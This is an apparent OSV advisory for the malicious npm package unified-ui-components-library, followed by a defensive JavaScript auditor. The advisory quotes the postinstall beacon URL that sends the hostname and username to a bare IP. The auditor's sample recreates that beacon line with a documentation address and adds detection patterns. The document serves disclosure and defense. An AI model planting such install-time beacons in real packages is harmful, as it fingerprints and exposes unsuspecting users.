MAL-2026-5648

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/unified-ui-components-library/MAL-2026-5648.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5648
Published
2026-06-11T13:23:56Z
Modified
2026-06-11T13:46:36.006020678Z
Summary
Malicious code in unified-ui-components-library (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (78fe6900f4329c8e4c7bb5322f0e30a3f3b90e289c45852fca61c4fd16f43fd8)

On npm install, the package's postinstall.js collects os.hostname() and os.userInfo().username and embeds them as query-string parameters in a plaintext HTTP GET to a hardcoded bare IP (http://161.97.149.48/skybackground.png?display=<hostname>&profile=<username>). The fetch is dressed up as an 'image download', but the identifying data sits in the URL that the server logs, giving the operator a per-install fingerprint of every machine that installs the package. The download path also follows 301/302 redirects to attacker-chosen Location headers and writes the server's response body to ./downloaded-image.jpg with no content-type validation, providing staging infrastructure alongside the beacon. Cover-story signals corroborate intent: package.json describes an 'image downloader CLI' with the placeholder author 'Your Name', README.md advertises an unrelated 'Simple Text Utils' API (capitalize/reverse/wordCount) that the code does not implement, and index.js exports only downloadImage. The advertised purpose, README, and shipped code disagree; the one behavior consistent across all three is the install-time phone-home.
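
The install-hook pattern described above can be screened for before a package is installed. The following heuristic auditor is an added example, not code from the OSV record or from the package; it reads the lifecycle hooks in package.json, opens the scripts they reference, and flags a hook that both reads host identity (os.hostname / os.userInfo) and contacts a bare-IP URL. The sample package.json and postinstall.js are constructed inline and use an RFC 5737 documentation address, not the IP from the report.

```javascript
// Constructed sample mimicking the install-hook shape described in the advisory.
// The address is an RFC 5737 documentation IP, not the one from the report.
const SAMPLE_PKG = { name: 'example-pkg', version: '1.0.0', scripts: { postinstall: 'node postinstall.js' } };
const SAMPLE_FILES = {
  'postinstall.js': [
    "const os = require('os');",
    "const url = 'http://203.0.113.10/skybackground.png?display=' + os.hostname() + '&profile=' + os.userInfo().username;",
    '// ... then follows redirects and writes the body to ./downloaded-image.jpg',
  ].join('\n'),
};

// npm lifecycle hooks that run code automatically during install.
const HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];
// Calls that read identifying data about the host or the current user.
const IDENTITY = [/\bos\.hostname\s*\(/, /\bos\.userInfo\s*\(/, /\bos\.networkInterfaces\s*\(/];
// URLs whose host is a bare IPv4 literal rather than a domain name.
const BARE_IP_URL = /https?:\/\/(?:\d{1,3}\.){3}\d{1,3}(?::\d+)?[^\s'"`]*/g;

// Extract the .js/.cjs/.mjs files referenced by the package's install hooks.
function hookScriptFiles(pkgJson) {
  const scripts = pkgJson.scripts || {};
  const files = new Set();
  for (const hook of HOOKS) {
    for (const m of (scripts[hook] || '').matchAll(/\b([\w.\/-]+\.[cm]?js)\b/g)) files.add(m[1]);
  }
  return [...files];
}

// readFile(path) returns the script's source text, or undefined if the file is absent.
// Returns one finding per hook script that matches a suspicious pattern.
function auditPackage(pkgJson, readFile) {
  const findings = [];
  for (const file of hookScriptFiles(pkgJson)) {
    const src = readFile(file);
    if (typeof src !== 'string') continue;
    const identity = IDENTITY.filter((re) => re.test(src)).map((re) => re.source);
    const urls = src.match(BARE_IP_URL) || [];
    if (identity.length && urls.length) {
      findings.push({ file, severity: 'high', reason: 'install hook reads host identity and contacts a bare-IP URL', identity, urls });
    } else if (urls.some((u) => u.startsWith('http://'))) {
      findings.push({ file, severity: 'medium', reason: 'install hook contacts a plaintext bare-IP URL', identity, urls });
    }
  }
  return findings;
}

console.log(JSON.stringify(auditPackage(SAMPLE_PKG, (f) => SAMPLE_FILES[f]), null, 2));
```

To audit a real tarball, extract it and pass a readFile that resolves paths relative to the extracted package directory; a "high" finding is a reason to block the install and inspect the script by hand.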

Database specific
{
    "malicious-packages-origins": [
        {
            "versions": [
                "10.0.3"
            ],
            "sha256": "5c2701b0b360af9ff8d06c12dcfaba8fbeff8840d1d7c56ce600a7ae8c5f1ffb",
            "modified_time": "2026-06-11T13:23:58Z",
            "source": "amazon-inspector",
            "import_time": "2026-06-11T13:27:21.388259152Z",
            "id": "IN-MAL-2026-005746"
        },
        {
            "versions": [
                "10.0.2"
            ],
            "sha256": "78fe6900f4329c8e4c7bb5322f0e30a3f3b90e289c45852fca61c4fd16f43fd8",
            "modified_time": "2026-06-11T13:24:02Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-005747",
            "import_time": "2026-06-11T13:27:21.417288346Z"
        },
        {
            "versions": [
                "10.0.1"
            ],
            "sha256": "baccf68297f0f532fddbf8186c16935ec20b3f30a749c5f0acdc5b0647567c76",
            "modified_time": "2026-06-11T13:23:56Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-005745",
            "import_time": "2026-06-11T13:27:21.301846096Z"
        }
    ]
}

Affected packages

npm / unified-ui-components-library

Package

Name
unified-ui-components-library
Purl
pkg:npm/unified-ui-components-library

Affected ranges

Affected versions

10.*
10.0.1
10.0.2
10.0.3

Database specific

indicators
{
    "package_integrity": [
        {
            "filename": "unified-ui-components-library-10.0.3.tgz",
            "hashes": {
                "sha512_sri": "sha512-aoAmrS8+YCBekWnvxVBddHf1O5gnZat0nVvnib06P9kN3Rzv+cJkyYVorhRAFDyL/EuK3JyW/t6PfvajUsqeBw==",
                "sha1": "6e133836325c29a1e602b5689462e58c1eb4bc11"
            }
        }
    ],
    "evidence_files": [
        {
            "sha256": "e2e4d144ce9269f1cbc6cc4d048d26acf573c258d4a656f61075635c9138e099",
            "path": "postinstall.js",
            "tlsh": "a251537519f351393237e0ad7f5b592ab2577403318dcb04358c71015fceaa486aa3bb"
        },
        {
            "sha256": "832350de287279bc69ad0e99185909518947f0f22a07f8526be86731552f4d22",
            "path": "package.json",
            "tlsh": "71e0ab1d89206e1335c80a982d5b190af25509470148bd0837e7006c0bae23f207e25f"
        }
    ]
}
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/unified-ui-components-library/MAL-2026-5648.json"
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]